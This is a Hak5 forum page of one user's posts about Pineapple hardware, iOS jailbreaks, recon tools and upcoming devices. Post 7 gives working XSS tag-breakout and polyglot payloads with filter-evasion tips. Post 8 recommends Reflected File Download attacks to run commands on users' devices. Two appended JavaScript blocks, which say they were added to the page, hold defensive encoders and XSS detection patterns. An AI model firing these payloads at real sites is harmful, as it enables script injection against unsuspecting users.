zoro25
Posts posted by zoro25

  1. I've done some searches on the forums and this has been asked many times, however there has never been a definitive answer on the support for the Alfa AWUS036ACH.

    This is one of the most popular adapters for Kali and while I know the PineApples are not Kali OS, they do run Linux flavors for which the Alfa AWUS036ACH has driver support.

    Has anyone managed to get the Alfa AWUS036ACH to show up on the PineApple? If yes, then please post steps; if not, then are any of the Hak5 team able to give a reason for the lack of support given how popular this adapter is?

  2. Yes, it seems that there is a bug on the latest firmware where tools are not being installed.

    I'll attempt the same recovery method to get this working.

    In my case I had Responder installed but I removed it and afterwards no tools will install :-(


  3. 8 hours ago, RazerBlade said:

    Link?

    http://newosxbook.com/liberios/ - and a link to Morpheus who did the hack: https://twitter.com/Morpheus______

    This was released 2 days ago and works with all iOS 11 devices. However, Cydia hasn't been updated to work with iOS 11, so any tweaks or sideloading of apps may not work just yet, but with this you can easily get SSH access into the device and play with binaries and command utilities you may want.

    I suggest using a spare device for any type of ARM/iOS hacking.

    Also expect this to be patched very soon.

  4. As a person who worked on one of the most popular iOS and Android apps (tens of millions of users on both platforms),

    I can confirm that both Google and Apple check updates, especially if any update requires extra user permissions. If no extra permissions are requested then, once approved (and it will certainly be checked before being allowed in their app stores), they will just do random checks on the app. Any iOS/Android exploits are too valuable to be out in the wild; the going rate for an iOS current-version hack is $1,000,000 and there was one shown just a few weeks ago (it won't be released). See https://keen-lab.com/jailbreak/11.1/ for a current iOS firmware hack that will be sold to the highest bidder.

    Team Keen has said that they will release the hack, but my guess is that it's already been sold and will be released publicly at the same time as a new iOS upgrade release. This happens a lot: exploit vendors, antivirus companies and software company consortiums get together and purchase a lot of the zero days in an effort to help better protect their users, and the original researcher will release the zero-day on the day of the patch release (the same thing happened with the KRACK exploit).

  5. It's been shown that the same Israeli company (Cellebrite I think their name is) that helped the FBI to bypass the iOS security on the San Bernardino shooter's phone can also bypass later firmware as well.

    Also, their CEO claims they can also bypass the current firmware (however, they have stated that they won't give any details or show that hack working as it's only for their three-letter-agency type customers).

    My guess is that there are a large number of zero days for iOS which are floating around but only released to top-paying bidders.

  6. Just saw that you already mentioned BuiltWith. That's who I use to profile things like this.

    https://builtwith.com/hak5.com

    They also have a browser plugin. It's very easy to use their API, or just scrape for an app you would write yourself.

    I also use TCPIPUtils for looking up networking info (subdomains etc.)

    https://www.tcpiputils.com/browse/domain/hak5.com

    I then also do a few other things, but BuiltWith and TCPIPUtils are my main 2.

  7. Also, I would suggest looking in the console of your browser for errors when injecting.

    As already mentioned, without knowing the app or the JS/HTML of the page it's hard to give a working payload.

    However, you can try either

    -->'";</ScriPT><sCriPt><confirm()</scRiPt>

    which may better break out of the HTML and is nice and short (similar to what you tried, but I included single and double quotes and also the end of a comment just in case you end up in a comment section).

    Or you can try a polyglot injection payload (these will usually set off a WebApp Firewall but feel free to try):

    javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">onerror=confirm().source<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>" 

    Or 

    jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!--

    which are both attempting to do the same thing.

    Good luck.


    *****

    EDIT

    While it's not my intention to pop alerts on the hak5 forum, you can see that one of the polyglots is working as planned and is breaking out of tags to show a broken image.

    This is the equivalent of <img src="x" />

    From here you would just need to tweak the code to pop an alert on a broken image; remember to read the console and attempt to bypass protections.

    onerror=confirm() or something similar for a basic pop on a broken image.

    ****
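The post above explains why its first payload works: the leading comment terminator and the two quote characters close whatever HTML context the input lands in, and the mixed-case tag defeats a naive lowercase filter. The defender's answer is output encoding chosen per context, and a case-insensitive signature check on the request side is what the post means by "set off a WebApp Firewall". The block below is an added example written for this page, not code from the post or from Hak5; the short payload and the `onerror=confirm()` hint are taken from the post, while the template, the function names and the second sample string are constructed here.

```javascript
// Added example (not from the original post): context-aware output encoding
// that neutralises tag-breakout payloads like the ones quoted in the thread,
// plus a WAF-style signature check of the kind that flags such probes.
// SHORT_PAYLOAD is copied from the post; IMG_PAYLOAD, the template and all
// function names are constructed for this example.

const SHORT_PAYLOAD = "-->'\";</ScriPT><sCriPt><confirm()</scRiPt>";
// Constructed variant of the "broken image" probe the post describes.
const IMG_PAYLOAD = '<img src="x" onerror=confirm()>';

// Every character that can open a tag, close an attribute or end a comment
// in an HTML body or a quoted attribute value.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

// Encode untrusted text for an HTML body or a double-quoted attribute value.
function encodeForHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => HTML_ENTITIES[ch]);
}

// Encode untrusted text for a JavaScript string literal inside <script>:
// every non-alphanumeric character becomes \xHH (or \uHHHH), so neither a
// quote nor a "</script" sequence can survive into the page.
function encodeForJsString(untrusted) {
  return String(untrusted).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Constructed template: the same value lands in an attribute, in the body
// and in a script block, each with the encoder that matches its context.
function renderComment(untrusted) {
  const safeHtml = encodeForHtml(untrusted);
  const safeJs = encodeForJsString(untrusted);
  return [
    `<div class="comment" title="${safeHtml}">${safeHtml}</div>`,
    `<script>var lastComment = '${safeJs}';</script>`,
  ].join('\n');
}

// True if a string still holds a raw character that can change HTML structure.
function containsRawMarkup(s) {
  return /[<>"']/.test(s);
}

// Detection side: case-insensitive patterns that the post's payloads trip
// on. Useful for alerting on probes seen in request logs or parameters.
const PROBE_PATTERNS = [
  /<\s*\/?\s*script\b/i,   // opening or closing script tag, any case
  /\bon[a-z]+\s*=/i,        // event-handler attribute such as onerror=
  /javascript\s*:/i,        // javascript: URL scheme
  /-->|\]\]>|<!--/,         // comment / CDATA terminators used to break out
];

function looksLikeXssProbe(value) {
  return PROBE_PATTERNS.some((re) => re.test(value));
}

// Verify that after rendering, the only tags present are the template's own
// four: nothing user-supplied survived as a raw tag.
function renderedIsInert(untrusted) {
  const rendered = renderComment(untrusted);
  const tags = rendered.match(/<\/?[a-z]+/gi) || [];
  const expected = ['<div', '</div', '<script', '</script'];
  return tags.length === expected.length &&
    tags.every((t, i) => t.toLowerCase() === expected[i]);
}
```

Two points worth noting from the design. The encoders are chosen by where the value is written, not by what the value looks like; a single "strip bad characters" filter cannot cover an attribute, a body and a script literal at once, which is exactly the gap the post's quotes-plus-comment-terminator trick probes for. The signature check is for detection only: `\bon[a-z]+\s*=` will also match a harmless `option=` parameter, so such patterns belong in an alert pipeline, not in the rendering path.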


  8. While I've not done this on the Pineapple, only on websites I've tested,

    my advice would be to take a look at RFD attacks (Reflected File Download attacks).

    It should be possible to set up a vulnerable page/site using EvilPortal or something similar on the Pineapple, and then your link should auto-download and run shell commands on the user's device (works on both Windows and *nix, but I've only tested against Windows users).

    I'm not going to walk you through the whole attack, but it's easy to do and requires little to no input from a user (it's also possible to bypass all browser security warnings).

    Here is a very good walkthrough by Oren Hafif, who now works for Facebook security I think.

    FACEBOOK RFD ATTACKS

    Good luck.

    PS this would make an awesome module (hint hint @Foxtrot) and would give easy total pwnage to the Pineapple devices.
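The post above points at Reflected File Download without spelling out what a site has to get wrong for it to work. The block below is an added example for this page, not Hak5 code and not taken from the walkthrough the post links to; it shows the server-side conditions an RFD link depends on and a constructed JSONP handler that closes each of them. Route names, the callback rule, the fixed filename and the response shape are all assumptions made for the example.

```javascript
// Added example (not from the original post): server-side hardening against
// Reflected File Download. RFD needs three things at once: user input
// reflected into the response body, a URL the browser will treat as a file
// to save, and a filename or extension the link author can choose. Each
// function below removes one of those conditions. All names are constructed.

// A JSONP callback must be a plain identifier; anything else (quotes, pipes,
// semicolons) would be reflected verbatim into the downloaded body.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]{0,63}$/;

function validateCallback(callback) {
  if (typeof callback !== 'string' || !CALLBACK_RE.test(callback)) {
    return null;
  }
  return callback;
}

// The server, not the URL, picks the saved filename and extension, and
// nosniff stops the browser from reinterpreting the content type.
function downloadHeaders(contentType, fixedFilename) {
  return {
    'Content-Type': contentType,
    'Content-Disposition': `attachment; filename="${fixedFilename}"`,
    'X-Content-Type-Options': 'nosniff',
  };
}

// Path-info such as "/api/users;/setup.bat" lets a link end in a name the
// server never intended. Serve only exact routes; reject everything else.
const ALLOWED_PATHS = new Set(['/api/users']);

function isAllowedPath(urlPath) {
  return ALLOWED_PATHS.has(urlPath);
}

// Framework-independent handler returning { status, headers, body }.
function buildJsonpResponse(urlPath, callbackParam, data) {
  if (!isAllowedPath(urlPath)) {
    return { status: 404, headers: { 'Content-Type': 'text/plain' }, body: 'not found' };
  }
  const callback = validateCallback(callbackParam);
  if (callback === null) {
    return { status: 400, headers: { 'Content-Type': 'text/plain' }, body: 'bad callback' };
  }
  // JSON.stringify escapes quotes and control characters in the data itself.
  const body = `${callback}(${JSON.stringify(data)});`;
  return {
    status: 200,
    headers: downloadHeaders('application/javascript; charset=utf-8', 'api-response.js'),
    body,
  };
}
```

The callback whitelist is the one that matters most: with no reflected shell metacharacters there is nothing for a downloaded file to execute, whatever name the link gave it. The fixed `Content-Disposition` filename and exact route matching are defence in depth, since they remove the attacker's control over how the browser saves the response even if a future endpoint reflects input more loosely.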

  9. Sorry to be a bit of a dick, but can you clarify "short order"? Are we talking days, weeks, months?

    I understand that new bugs pop up that need to be fixed as newer features are added, but I'm guessing there is some internal date that could be given (feel free to pad the date with extra time to fix the unknown unknowns).

  10. I think you guys are missing the R&D costs.

    If you look at Seytonic, he pushes (or sells) Malduino, but the Malduino uses DuckyScript as its language.

    Who invented DuckyScript? Hak5.

    Okay, so it's not massively hard to come up with a new simple scripting language or even using the Malduino for USB automation, but no one else did it in a small easy-to-use package.

    That's what Hak5 brings: ease of use and some resemblance of support (I say resemblance as most of the support is from the community so it's hit or miss). Sure, you can do a lot of the Pineapple stuff via a Linux OS with your network cards in promiscuous mode, but the Pineapples just give you a nice small package with which to carry out your engagement.

    Seytonic is great and his guides are awesome for those with less cash, but lots of Hak5 customers are businesses/Govt agencies or just people with a passion for security who don't mind paying a little extra for the community.

    Hak5, if anything, has been a bit of a victim of its success: its customer base grew massively over the last few years (Pineapple 5 onwards) and it seems only now the dev team is beginning to catch up to cope with that larger customer expectation. Bringing in Seb was a good start back at the start of Pineapple 5, but he and Darren have always been swamped. For example, almost 2 weeks after the source for Kracked was leaked (openly available), which is the biggest thing to happen to WiFi in about 10 years, the Pineapples still haven't got modules/new firmware (in fact, while I'm on it, the firmware is over a year old).

    Let's hope with the larger dev team things get better.

  11. I didn't read it as a worm but as attacking machines attached to a switch (let's say 8 devices). As previously mentioned, it's going to be hard as it sounds like he's looking for persistence.

    Those 8 machines could be any OS/IoT devices, so yes you can MITM them to grab credentials etc., but getting persistent access is going to be hard as this usually means exploiting some kind of bug in the underlying OS or software running on the device (see the earlier reply from PoSHMagiC0de).

    I think you should instead be looking at how to exploit 1 device on the switch with high certainty using the Squirrel, and then you need to know/learn how to pivot from there to gain further access to other devices. This is how most engagements work. People never really start with owning the network, but find a weak point (phishing etc.) and pivot from there.

  12. Does anyone know anything about that "Friday thing" mentioned in today's Hak5 video? Or what I'm guessing is a new PineApple firmware release, or at least a new Krack module.

    ****EDIT**** (after watching it back, it seems that the Friday thing may have been last week's Packet Squirrel announcement; I watched the recorded streams but didn't see anything new Pineapple- or Krack-related)


  13. See my post here about other possible items.

    While nothing is confirmed by the team, these are registered by Darren. However, it should be noted that only the PacketSquirrel.com domain has any content. The others all give errors.

    Also, even if those were the names of new tools, a name still gives us nothing about how the tool carries out its attack or what it can do to aid pivoting, except maybe the way it connects.

    For example:

    USBLadyBug = USB device attack, meaning physical access to the device under test will be needed

    ScreenCrab = No idea on attack style, but it seems like it could be a remote screen-grabbing tool (I've no idea how this could work if it was that)

    USBBoomStick = again USB in the name, so I suppose another tool needing physical access

    Only about 2 days to go.

  14. Darren confirmed that 3 devices are going to be released on Friday. Packet Squirrel just seems to be one of them (unless there are 2 versions of the Squirrel, like the Nano and Tetra are 2 versions of the same tool).

    Anyway, looking forward.

    Still no pre-order. Seems I'm going to have to be okay with ordering on the unveiling; just hope the team can ship quickly (otherwise, I can always play when I get back from my trip).


  15. Any chance of setting up preorders? (Yes, I know we don't know what it is yet, but I would still purchase from my previous good experience with Hak5 stuff.) Gotta say only a couple of companies I know of have such a loyal following that people will buy their stuff without even knowing fully what it is (Hak5 and Tesla are the only 2 that come to mind).

    I ask about pre-order as I'm leaving the country for a few weeks around the start of November and would love to play with new toys on my break.

    Not sure if it would get here in time if I were to order on release date.

    Also, while this looks nothing like the picture, I would love something like this:

    https://www.aliexpress.com/item/1m-GPS-Positioning-Pick-up-Line-Tracker-Remote-Tracking-Cable-GIM-Answer-Monitor-USB-Charging-Data/32813314360.html?trace=msiteDetail2pcDetail

    or a better one on Amazon that handles both iOS and Android devices: https://www.amazon.com/Tracker-Vehicles-Charger-Tracking-Device/dp/B0719692ST/

    But have it instead take over the network of whatever device it's plugged into.

    So it looks like a normal USB cable but has LTE or 3G and can assume the default network device.

    Would obviously work on PC/Mac/Android and iOS as main candidates (just dropping ideas :-) ).

    Only thing I'm not sure about is if it needs a network controller chip at both ends in case it's plugged from PC to phone (log + take over both networks and have full end-to-end device control).

    Anyway, I await the 20th and the new devices (plural - WhoooHooo).

  16. 19 minutes ago, Dave-ee Jones said:

    Pretty sure someone has attempted to join the forces of the PineAP and the BB, just didn't see what they came up with. I'm sure if you did a search on the forums you might be able to find out.


    Yeah, Seb mentioned that he was going to release something at one point https://forums.hak5.org/topic/40215-pineapple-core/ and also see where Seb mentioned an "official solution soon".

    However, from the discussion, it does seem that the Bunny does take the place of the often-mentioned PineApple Core (meaning that the Squirrel most likely isn't that either).

    So there go my 2 guesses. :-)

    Not long now, let's hope they get the location confirmed and then we'll have a hard and fast date to look forward to. 
